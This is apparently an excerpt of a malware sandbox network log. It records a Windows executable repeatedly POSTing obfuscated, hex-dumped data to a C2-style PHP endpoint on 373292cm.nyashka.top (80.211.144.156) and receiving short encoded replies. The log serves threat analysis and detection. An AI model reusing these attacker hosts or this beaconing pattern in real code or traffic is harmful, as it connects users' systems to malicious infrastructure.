                                                                    Aug 21, 2024 10:04:32.941917896 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:33.069655895 CEST308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 26 57 28 26 36 5d 25 2b 2c 18 25 23 25 0f 29 3d 27 12 29 2e 2a 01 24 16 2e 07 25 10 28 1c 24 28 29 10 28 58 35 09 24 3f 38 05 2d 0e 2b 5d 0c 13 22 1b 23 39 35 00 24 3c 23 01 29 3b 23 16 35 05 3a 5d 29 29 29 54 3c 3f 30 59 28 39 0d 58 2a 3a 04 1c 2c 28 04 02 39 30 08 54 34 04 2b 52 0d 11 24 55 29 3e 39 53 3d 3e 27 59 36 3b 23 5f 27 3d 31 08 32 32 26 53 27 39 2f 02 26 22 1c 0e 25 31 2a 0d 31 38 3e 5f 26 2c 39 51 21 22 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: &W(&6]%+,%#%)=').*$.%($()(X5$?8-+]"#95$<#);#5:])))T<?0Y(9X*:,(90T4+R$U)>9S=>'Y6;#_'=122&S'9/&"%1*18>_&,9Q!"#T,"W3UV


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    92192.168.2.75305180.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:32.398319960 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:32.755793095 CEST2544OUTData Raw: 5f 5d 59 50 51 47 54 51 5b 5f 5a 51 59 55 58 54 57 5c 5d 5c 57 5e 53 58 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _]YPQGTQ[_ZQYUXTW\]\W^SXYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/+@! )[*(](%^+?[4(#W3(*(#*,&F$.Y/-
                                                                    Aug 21, 2024 10:04:33.072755098 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:33.272763014 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    93192.168.2.75305280.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:33.436158895 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:04:33.789589882 CEST2544OUTData Raw: 5a 57 5c 52 54 42 51 5a 5b 5f 5a 51 59 51 58 53 57 5c 5d 5b 57 58 53 5f 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZW\RTBQZ[_ZQYQXSW\][WXS_YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-80 5[(]"06*<(=)_($#/+S#1(_#V%/&F$.Y/=
                                                                    Aug 21, 2024 10:04:34.090111971 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:34.217557907 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    94192.168.2.75305380.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:34.351901054 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:34.709054947 CEST2544OUTData Raw: 5f 54 5c 56 54 42 54 5f 5b 5f 5a 51 59 55 58 56 57 5d 5d 5b 57 5a 53 55 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _T\VTBT_[_ZQYUXVW]][WZSUYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-.#;A!-7 >>+?:+=7<3!2<P+;]4,>&F$.Y/-
                                                                    Aug 21, 2024 10:04:35.014197111 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:35.142983913 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    95192.168.2.75305480.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:35.274183035 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:35.630986929 CEST2544OUTData Raw: 5f 55 59 55 54 48 51 59 5b 5f 5a 51 59 50 58 57 57 5f 5d 52 57 58 53 5f 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _UYUTHQY[_ZQYPXWW_]RWXS_YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/"73%>-$\+-<.7#,3P#2,?(" =_/&F$.Y/
                                                                    Aug 21, 2024 10:04:35.951822996 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:36.081366062 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    96192.168.2.75305580.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:36.243482113 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:36.599529982 CEST2544OUTData Raw: 5f 5c 59 57 54 48 51 5d 5b 5f 5a 51 59 56 58 53 57 58 5d 5f 57 50 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _\YWTHQ][_ZQYVXSWX]_WPS\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.,03D!? 0)4+><"<V7W#<_;Y"#5/&F$.Y/!
                                                                    Aug 21, 2024 10:04:36.921627045 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:37.055115938 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    97192.168.2.75305680.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:37.178802013 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:37.537033081 CEST2544OUTData Raw: 5f 54 5c 51 51 42 54 58 5b 5f 5a 51 59 53 58 55 57 5f 5d 5e 57 59 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _T\QQBTX[_ZQYSXUW_]^WYSTYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-,#8"# 2*<>[(#X <(7,*9 9_/&F$.Y/5
                                                                    Aug 21, 2024 10:04:37.870435953 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:38.003154039 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    98192.168.2.75305780.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:38.092103004 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1868
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    99192.168.2.75305880.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:38.134053946 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:38.490485907 CEST2544OUTData Raw: 5a 56 5c 5e 51 42 54 5c 5b 5f 5a 51 59 56 58 55 57 5a 5d 5d 57 58 53 55 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZV\^QBT\[_ZQYVXUWZ]]WXSUYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/?5[#73%\)=$+==^(=$7( *9 1/&F$.Y/!
                                                                    Aug 21, 2024 10:04:38.814312935 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:39.142288923 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[
                                                                    Aug 21, 2024 10:04:39.144650936 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    100192.168.2.75305980.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:39.273078918 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:04:39.630863905 CEST2544OUTData Raw: 5f 5c 5c 5f 54 41 54 5c 5b 5f 5a 51 59 52 58 54 57 5d 5d 5c 57 5d 53 5a 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _\\_TAT\[_ZQYRXTW]]\W]SZYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/ 0"-]706=??..+'43R#!(?3#:,.&F$.Y/1
                                                                    Aug 21, 2024 10:04:39.932106018 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:40.057676077 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    101192.168.2.75306080.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:40.179615974 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:40.537117004 CEST2544OUTData Raw: 5a 52 5c 5e 54 40 54 5b 5b 5f 5a 51 59 54 58 56 57 50 5d 58 57 50 53 5e 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZR\^T@T[[_ZQYTXVWP]XWPS^YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-,3".(70)+-/+.5[< #W 2<V+)0" 2,.&F$.Y/)
                                                                    Aug 21, 2024 10:04:40.834144115 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:41.031397104 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    102192.168.2.75306180.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:41.281421900 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:41.651758909 CEST2544OUTData Raw: 5a 56 59 54 54 44 54 59 5b 5f 5a 51 59 5e 58 57 57 5c 5d 5c 57 50 53 5d 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZVYTTDTY[_ZQY^XWW\]\WPS]YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.X/3#A!$\ V6=,Y?:??Z7?+Q40Q()4 #9\,>&F$.Y/
                                                                    Aug 21, 2024 10:04:42.000904083 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:42.131247044 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    103192.168.2.75306280.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:42.744857073 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:43.099802971 CEST2544OUTData Raw: 5a 55 59 50 51 45 51 5c 5b 5f 5a 51 59 54 58 51 57 50 5d 5c 57 5a 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZUYPQEQ\[_ZQYTXQWP]\WZSTYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.^;".' V&>=<_?.&+ ,7R42<<07:;.&F$.Y/)


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    104192.168.2.75306380.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:43.139095068 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1844
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:43.490190029 CEST1844OUTData Raw: 5f 57 59 52 54 48 54 58 5b 5f 5a 51 59 51 58 54 57 5e 5d 5c 57 51 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _WYRTHTX[_ZQYQXTW^]\WQS\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-,?5$X4V>>-<=5^(["/?41<(###>8>&F$.Y/=
                                                                    Aug 21, 2024 10:04:43.825052023 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:43.951148033 CEST308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 26 1f 29 1b 04 11 32 28 33 08 33 33 25 0b 2a 03 2c 07 2a 2d 0b 14 25 2b 25 59 27 2d 24 57 33 05 2a 01 28 2e 08 56 31 3f 2f 58 2d 1e 2b 5d 0c 13 21 05 37 3a 07 00 25 12 09 00 3d 38 30 04 21 12 08 58 3f 3a 2e 08 2b 2f 24 1d 3c 39 3c 04 28 5c 36 1f 38 16 0b 5d 2e 30 04 13 22 3e 2b 52 0d 11 24 52 29 2e 39 1d 2a 58 34 00 36 3b 3b 1d 30 13 3e 55 24 22 03 0d 30 00 38 59 31 1c 2a 0d 33 0f 2e 08 26 2b 31 07 25 01 07 54 35 18 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: &)2(333%*,*-%+%Y'-$W3*(.V1?/X-+]!7:%=80!X?:.+/$<9<(\68].0">+R$R).9*X46;;0>U$"08Y1*3.&+1%T5#T,"W3UV


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    105192.168.2.75306480.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:43.259960890 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:43.616795063 CEST2544OUTData Raw: 5f 55 5c 5e 54 49 54 5d 5b 5f 5a 51 59 5e 58 53 57 5a 5d 5f 57 58 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _U\^TIT][_ZQY^XSWZ]_WXSTYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.\;3B!=7*(Y<.-(.'Y4#W#W#<?73%Y/&F$.Y/
                                                                    Aug 21, 2024 10:04:43.940027952 CEST25INHTTP/1.1 100 Continue
